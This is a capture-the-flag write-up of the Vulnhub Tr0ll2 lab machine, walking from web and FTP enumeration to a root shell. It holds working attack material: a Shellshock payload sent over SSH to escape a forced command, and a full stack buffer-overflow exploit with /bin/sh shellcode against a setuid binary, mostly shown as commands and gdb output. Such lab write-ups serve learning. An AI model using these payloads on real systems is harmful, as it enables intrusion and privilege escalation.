Vulnhub Tr0ll2
Vulnhub
Tr0ll2
I liked so much being troll the first time that i decided to do the second one. Let’s send a scan it’s way
nmap -sS -sC -p- -T 4 -A 192.168.1.121 -oN nmap_Scan
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-27 04:54 EDT
Nmap scan report for Tr0ll2 (192.168.1.121)
Host is up (0.00024s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:F7:66:43 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.24 ms Tr0ll2 (192.168.1.121)
Once again, 21,22 et 80 open.
Website
Nikto scan to begin with.
nikto -h 192.168.1.121
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.121
+ Target Hostname: 192.168.1.121
+ Target Port: 80
+ Start Time: 2017-05-27 04:57:23 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 13079, size: 110, mtime: Tue Oct 14 22:05:15 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8346 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2017-05-27 04:57:34 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Let’s try with dirb
dirb http://192.168.1.121 /usr/share/wordlists/dirb/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 27 04:58:55 2017
URL_BASE: http://192.168.1.121/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.121/ ----
+ http://192.168.1.121/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.1.121/index (CODE:200|SIZE:110)
+ http://192.168.1.121/index.html (CODE:200|SIZE:110)
+ http://192.168.1.121/robots (CODE:200|SIZE:346)
+ http://192.168.1.121/robots.txt (CODE:200|SIZE:346)
+ http://192.168.1.121/server-status (CODE:403|SIZE:294)
-----------------
END_TIME: Sat May 27 04:58:57 2017
DOWNLOADED: 4612 - FOUND: 6
We got the robots.txt file
curl 192.168.1.121/robots.txt
User-agent:*
Disallow:
/noob
/nope
/try_harder
/keep_trying
/isnt_this_annoying
/nothing_here
/404
/LOL_at_the_last_one
/trolling_is_fun
/zomg_is_this_it
/you_found_me
/I_know_this_sucks
/You_could_give_up
/dont_bother
/will_it_ever_end
/I_hope_you_scripted_this
/ok_this_is_it
/stop_whining
/why_are_you_still_looking
/just_quit
/seriously_stop
I guess that would be more folder ? Let’s clean the file and use it as word list for dirb .
dirb http://192.168.1.121 ./robots.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 27 05:02:22 2017
URL_BASE: http://192.168.1.121/
WORDLIST_FILES: ./robots.txt
-----------------
GENERATED WORDS: 21
---- Scanning URL: http://192.168.1.121/ ----
+ http://192.168.1.121//noob (CODE:301|SIZE:313)
+ http://192.168.1.121//keep_trying (CODE:301|SIZE:320)
+ http://192.168.1.121//dont_bother (CODE:301|SIZE:320)
+ http://192.168.1.121//ok_this_is_it (CODE:301|SIZE:322)
-----------------
END_TIME: Sat May 27 05:02:22 2017
DOWNLOADED: 21 - FOUND: 4
Alright we got som redirects (Error 3XX), two of them gave a size 320 and the two other size 313 and 322.
Each page has a picture. Let’s download them and pass them through strings. It’s a habbit that i’ve had.
So after looking at their strings results and running them with the diff command, we can see that don’t bother has a different image from the other ones.
strings dont_bother.jpg
...
Look Deep within y0ur_self for the answer
This is the only difference between the pictures.
We’ll append it to the url so http://192.168.1.121/y0ur_self
We get another indexed directory with a huge text file called answer.txt. The file has just under 100k lines and look like euh… i’m not sure what this is.
So tried running dirb with the file that was found and nada.
dirb http://192.168.1.121 ./answer.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 27 18:15:50 2017
URL_BASE: http://192.168.1.121/
WORDLIST_FILES: ./answer.txt
-----------------
GENERATED WORDS: 73128
---- Scanning URL: http://192.168.1.121/ ----
-----------------
END_TIME: Sat May 27 18:18:02 2017
DOWNLOADED: 73128 - FOUND: 0
So they look like base64 encoded line (because of the paddings “=”), so we need
to decode all 99k lines through the command base64 -d
for i in $(cat answer.txt);do echo $i | base64 -d ;done > decoded_answers.txt
Alright after a few seconds we got another list with 99k words. They could be passwords but we don’t have a login. I guess more dirb it is.
dirb http://192.168.1.121/ decoded_answers.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 28 02:11:58 2017
URL_BASE: http://192.168.1.121/
WORDLIST_FILES: decoded_answers.txt
-----------------
GENERATED WORDS: 73128
---- Scanning URL: http://192.168.1.121/ ----
+ http://192.168.1.121/index (CODE:200|SIZE:110)
+ http://192.168.1.121/robots (CODE:200|SIZE:346)
END_TIME: Sun May 28 02:14:22 2017
DOWNLOADED: 73128 - FOUND: 2
Umm nothing good. So this is obviously a wordlist, but from where and what’s the point ? So i know that the OS running on the machine is ubuntu. I went and look for the default wordlists in Ubuntu. You can find one in /etc/dictionnaries-comon/words. The wordlist starts with the same characters. But the problem is that the words file contain’s “’s” after some words.
So i’ll take them out from all the lines, then do a diff between the decoded_answers and words.txt.
sed -i "s/'s//g" words.txt
diff words.txt decoded_answer.txt > diff.txt
If we look at the diff.txt, we notice that there’s a few differences between the files, some of them look VERY suspicious.
These words really stick out from the reset of them
ItCantReallyBeThisEasyRightLOL
trollololol
noooob_lol
So this could be either more web folders, ssh login/pass? or ftp login/pass
After trying all the possible combinaisons with hydra, i got nothing at all. This is not good. After spending two hours on trying to figure out what i missed i had to opt to look at a guide to see what i missed.
Apparently it was in the ftp part. Tr0ll:Tr0ll is an account based on the hostname of the vm. That’s a super long shot that i would have never found.
The FTP had a lmao.zip
ftp 192.168.1.121
Connected to 192.168.1.121.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (192.168.1.121:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1474 Oct 04 2014 lmao.zip
226 Directory send OK.
ftp> get lmao.zip
local: lmao.zip remote: lmao.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
226 Transfer complete.
1474 bytes received in 0.00 secs (3.0101 MB/s)
ftp> exit
221 Goodbye.
unzip lmao.zip
[lmao.zip] noob password:
So the zip file needs a password and ItCantReallyBeThisEasyRightLOL worked as a password. It gives us a file called noob.
file noob
noob: PEM RSA private key
This should be enough to be able to ssh into the machine
ssh -i noob [email protected]
TRY HARDER LOL!
Connection to 192.168.1.121 closed.
Or not…
So i had to look for another hint for this machine. Shellcode exploitation. Read this article that explains how it works.
http://resources.infosecinstitute.com/practical-shellshock-exploitation-part-1/
So what we needed to do was
ssh -t -i noob [email protected] '() { :;}; /bin/bash -i'
noob@Tr0ll2:~$ id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
noob@Tr0ll2:~$
cat .bash_history
./bof
./bof @@@@@@@@@@@@
gdb bof
rm bof
ls -al
rm .bash_history
su root
noob@Tr0ll2:~$
Alright we’re in.
So this time, i’ll run this script that can be found here.
https://highon.coffee/blog/linux-local-enumeration-script/
It gives us some valuable information.
It shows us Sticky bits files and this ones we’re created for us.
drwsr-xr-x 3 root root 4096 May 28 05:00 /nothing_to_see_here
drwsr-xr-x 5 root root 4096 Oct 4 2014 /nothing_to_see_here/choose_wisely
drwsr-xr-x 2 root root 4096 Oct 5 2014 /nothing_to_see_here/choose_wisely/door2
drwsr-xr-x 2 root root 4096 Oct 5 2014 /nothing_to_see_here/choose_wisely/door3
drwsr-xr-x 2 root root 4096 Oct 4 2014 /nothing_to_see_here/choose_wisely/door1
There’s also this.
ls -lha /bin/ls
-rwxrwxrwx 1 root root 103K Mar 31 2012 /bin/ls
So ls is writeable for some reasons…
The right door
So there’s some stuff in the directory /nothing_to_see_here
find . -type f -exec file {} \;
./door2/r00t: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x80ac0ab3dd7ab04707b2fec1a7bca030e20e4654, not stripped
./door3/r00t: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x438546c50f77d4bac3e0c41b4f8bcd60899c4006, not stripped
./door1/r00t: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x4ceb2022ad50bc899c84f5e30793fe06b0a166c0, not stripped
find . -type f -exec ls -l {} \;
-rwsr-xr-x 1 root root 7273 Oct 5 2014 ./door2/r00t
-rwsr-xr-x 1 root root 8401 Oct 5 2014 ./door3/r00t
-rwsr-xr-x 1 root root 7271 Oct 4 2014 ./door1/r00t
We got 3 binaries with the named r00t and are all using the sticky bit. I’ll transfer all of them on kali machine and run string/gdb.
This first one that is behind the first door has this when i run strings
Good job, stand by, executing root shell...
BUHAHAHA NOOB!
/sbin/reboot
;*2$"
So yeah this would reboot the machine.
The second one has
2 MINUTE HARD MODE LOL
/bin/chmod 600 /bin/ls
/bin/chmod 777 /bin/ls
;*2$"
And the third one has
Usage: %s input
;*2$"
GCC: (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
bof.c
<built-in>
long long int
strcpy
long long unsigned int
unsigned char
main
/home/noob
GNU C 4.6.3
argc
short unsigned int
exit
bof.c
short int
argv
So the third one makes more sense, also there’s strcpy which is vulnerable to buffer overflows. So i guess a buffer overflow will end this machine. All of the r00t are running as root also.
After doing a restart of tr0ll2, it looks like the right binary switches location randomly. q
Buffer overflow
So like always, let’s make it crash to start.
We’ll create a pattern then pass it as argument. I’ll start with a 128 length string as slowly raise it until it crashes. I got like to crash at 400.
pattern_create 400
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y'
gdb-peda$ set args 'AAA%AAsAABAAAAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y'
[----------------------------------registers-----------------------------------]
EAX: 0x190
EBX: 0x0
ECX: 0x7ffffe6f
EDX: 0xb7fb4870 --> 0x0
ESI: 0xb7fb3000 --> 0x1aedb0
EDI: 0xb7fb3000 --> 0x1aedb0
EBP: 0x64254148 ('HA%d')
ESP: 0xbffff4f0 ("%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
EIP: 0x41332541 ('A%3A')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41332541
[------------------------------------stack-------------------------------------]
0000| 0xbffff4f0 ("%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0004| 0xbffff4f4 ("eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0008| 0xbffff4f8 ("A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0012| 0xbffff4fc ("%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0016| 0xbffff500 ("5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0020| 0xbffff504 ("A%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0024| 0xbffff508 ("%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0028| 0xbffff50c ("LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41332541 in ?? ()
gdb-peda$ pattern_
pattern_arg pattern_create pattern_env pattern_offset pattern_patch pattern_search
gdb-peda$ pattern_offset 0x41332541
1093870913 found at offset: 268
gdb-peda$
So we got an offset at 268.
Let’s double check that the offset is actually good. We’ll send “A” * 268 + “B” * 4
r $(python -c 'print "A" * 268 + "B" * 4')
[----------------------------------registers-----------------------------------]
EAX: 0x110
EBX: 0x0
ECX: 0x7ffffeef
EDX: 0xb7fb4870 --> 0x0
ESI: 0xb7fb3000 --> 0x1aedb0
EDI: 0xb7fb3000 --> 0x1aedb0
EBP: 0x41414141 ('AAAA')
ESP: 0xbffff570 --> 0x0
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xbffff570 --> 0x0
0004| 0xbffff574 --> 0xbffff604 --> 0xbffff738 ("/root/Vulnhub/tr0ll2/door3")
0008| 0xbffff578 --> 0xbffff610 --> 0xbffff864 ("XDG_SESSION_ID=2")
0012| 0xbffff57c --> 0x0
0016| 0xbffff580 --> 0x0
0020| 0xbffff584 --> 0x0
0024| 0xbffff588 --> 0xb7fb3000 --> 0x1aedb0
0028| 0xbffff58c --> 0xb7fffc04 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()
We an see that we’re overwritten the EIP with B’s, so everything is good.
Now we need a return address that we’ll insert as EIP. We’ll go look where our shellcode is in the memory. I’ll add some padding to make it easier to spot and also easier to land on it.
Also by trial and error i found that there’s 161 bytes available after our return address. So if we can’t fit our payload there, we would need to create an EGGhunt. But since we only need a simple shell on the local machine the shellcode shouldn’t be too big.
The shellcode that i’ll be using can be found here
http://shell-storm.org/shellcode/files/shellcode-585.php
So we’ll be sending r $(python -c ‘print “A” * 268 + “XXXX” + “\x90” * 25 + “\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”’)
And we’ll have to see where out shellcode reside.
EAX: 0xbffffa50 ('A' <repeats 200 times>...)
EBX: 0xb7fd1ff4 --> 0x1a5d7c
ECX: 0xbffffe70 ("bin/sh")
EDX: 0xbffffb8c ("bin/sh")
ESI: 0x0
EDI: 0x0
EBP: 0xbffffb58 ("AAAAXXXX\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\353\v[1\300\061\311\061Ұ\v̀\350\360\377\377\377/bin/sh")
ESP: 0xbffffa40 --> 0xbffffa50 ('A' <repeats 200 times>...)
EIP: 0x8048490 (<main+76>: mov eax,0x8048591)
EFLAGS: 0x200202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048484 <main+64>: lea eax,[esp+0x10]
0x8048488 <main+68>: mov DWORD PTR [esp],eax
0x804848b <main+71>: call 0x8048350 <strcpy@plt>
=> 0x8048490 <main+76>: mov eax,0x8048591
0x8048495 <main+81>: lea edx,[esp+0x10]
0x8048499 <main+85>: mov DWORD PTR [esp+0x4],edx
0x804849d <main+89>: mov DWORD PTR [esp],eax
0x80484a0 <main+92>: call 0x8048340 <printf@plt>
[------------------------------------stack-------------------------------------]
0000| 0xbffffa40 --> 0xbffffa50 ('A' <repeats 200 times>...)
0004| 0xbffffa44 --> 0xbffffd34 ('A' <repeats 200 times>...)
0008| 0xbffffa48 --> 0x1
0012| 0xbffffa4c --> 0x8b0
0016| 0xbffffa50 ('A' <repeats 200 times>...)
0020| 0xbffffa54 ('A' <repeats 200 times>...)
0024| 0xbffffa58 ('A' <repeats 200 times>...)
0028| 0xbffffa5c ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
15 in bof.c
gdb-peda$ hexdump $esp 400
0xbffffa40 : 50 fa ff bf 34 fd ff bf 01 00 00 00 b0 08 00 00 P...4...........
0xbffffa50 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffa60 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffa70 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffa80 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffa90 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffaa0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffab0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffac0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffad0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffae0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffaf0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb00 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb10 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb20 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb30 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb40 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb50 : 41 41 41 41 41 41 41 41 41 41 41 41 58 58 58 58 AAAAAAAAAAAAXXXX
0xbffffb60 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffb70 : 90 90 90 90 90 90 90 90 90 eb 0b 5b 31 c0 31 c9 ...........[1.1.
0xbffffb80 : 31 d2 b0 0b cd 80 e8 f0 ff ff ff 2f 62 69 6e 2f 1........../bin/
0xbffffb90 : 73 68 00 00 e5 2d 57 54 f5 c9 08 63 00 00 00 00 sh...-WT...c....
0xbffffba0 : 00 00 00 00 00 00 00 00 02 00 00 00 90 83 04 08 ................
0xbffffbb0 : 00 00 00 00 b0 26 ff b7 e9 53 e4 b7 f4 ef ff b7 .....&...S......
0xbffffbc0 : 02 00 00 00 90 83 04 08 00 00 00 00 b1 83 04 08 ................
--More--(25/25)gdb-peda$
We can see here that our nop sled that’s at 0xbffffb60, so i tried adding that address as a return address. It worked on gdb but didn’t work when i used the binary directly. After some trial and error it seems that 0xbffffb80 worked perfectly. This is how the final code looks like.
./r00t $(python -c 'print "A" * 268 + "\x80\xfb\xff\xbf" + "\x90" * 25 + "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"') <x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"')
id
uid=1002(noob) gid=1002(noob) euid=0(root) groups=0(root),1002(noob)
whoami
root
This buffer overflow was tricky. I tried using the RET instruction as a return address and couldn’t make it work. Lost a lot of time trying to figure it out.
Still it was pretty fun.